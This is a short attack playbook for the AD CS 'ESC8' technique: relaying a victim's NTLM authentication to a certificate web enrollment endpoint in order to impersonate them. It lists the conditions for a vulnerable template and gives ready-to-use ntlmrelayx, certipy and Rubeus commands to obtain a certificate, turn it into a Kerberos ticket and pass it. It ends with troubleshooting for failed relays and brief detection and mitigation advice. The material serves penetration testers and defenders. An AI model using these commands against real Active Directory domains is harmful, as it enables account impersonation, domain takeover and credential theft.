ADCS - ESC 8

Relay a victim user's NTLM authentication to a vulnerable HTTP(S) AD CS enrollment endpoint in order to impersonate the victim user.

Vulnerable Template Requirements

• AD CS HTTP endpoint: Web Enrollment (/certsrv) or CES/CEP/NDES reachable (HTTP or HTTPS); NTLM allowed; Extended Protection (EPA/channel binding) disabled.
• EKU: Client Authentication, PKINIT Client Authentication, or Smartcard Logon; Any Purpose or no EKU only if policy allows.
• Subject/SAN: Built from AD by the policy module (no enrollee‑supplied subject required).
• Enrollment Rights: Relayed identity (user/computer) has Enroll (or Autoenroll) on the target template.
• Issuance Controls: Requires Manager Approval = False; Authorized Signatures Required = 0.
• Mapping Posture (DCs): Certificate mapping permits logon for the issued cert per domain policy.

If EPA is enabled or NTLM is disabled on the endpoint, relay will fail. If Strong Certificate Mapping is enforced, the issued cert must meet strong‑mapping policy to be usable for logon.

Attack Path

1. Relay

Run a relay to capture NTLM authentication and request a certificate as the victim identity.

ntlmrelayx — Catch broad traffic and relay to AD CS (and optionally LDAP/SMB)

ntlmrelayx.py -t http(s)://<adcs_fqdn>/certsrv/certfnsh.asp --adcs --template <TemplateName> -smb2support

ntlmrelayx requires /certsrv/certfnsh.asp for the target.

certipy — Targeted, streamlined AD CS relay (good with predictable coercion like PetitPotam)

certipy relay -target http(s)://<adcs_fqdn>/certsrv/ -ca "<CA_Name>" -template <Template_Name> -out <victim.pfx>

certipy accepts /certsrv/ for the target and resolves internally.

2. Convert PFX to TGT

Linux

certipy auth -pfx <victim>.pfx -dc-ip <dc_ip>

Windows

Rubeus.exe asktgt /user:<target_sam_or_upn> /domain:<domain_fqdn> /dc:<dc_fqdn> /certificate:<C:\path\to\target.pfx> /password:<pfx_password> /ptt

3. Use the credential

• Remote Code Execution
• DCSync
  • If victim was a DC account (DC$).

Troubleshooting

• Policy module errors 0x80094800 / 0x8009480F: template requires approval or subject/SAN constraints; pick another template or adjust subject options.
• Relay connects but no cert: EPA enforced or NTLM disabled on the site; not vulnerable.
• PFX OK but auth fails: template missing Client Authentication EKU or CA policy didn’t populate UPN; choose a different template.

Detection / Mitigation

• Require EPA and HTTPS on /certsrv (and CES/CEP if present); prefer Negotiate:Kerberos only.
• Limit Enroll on client‑auth templates; monitor spikes in issued client‑auth certificates.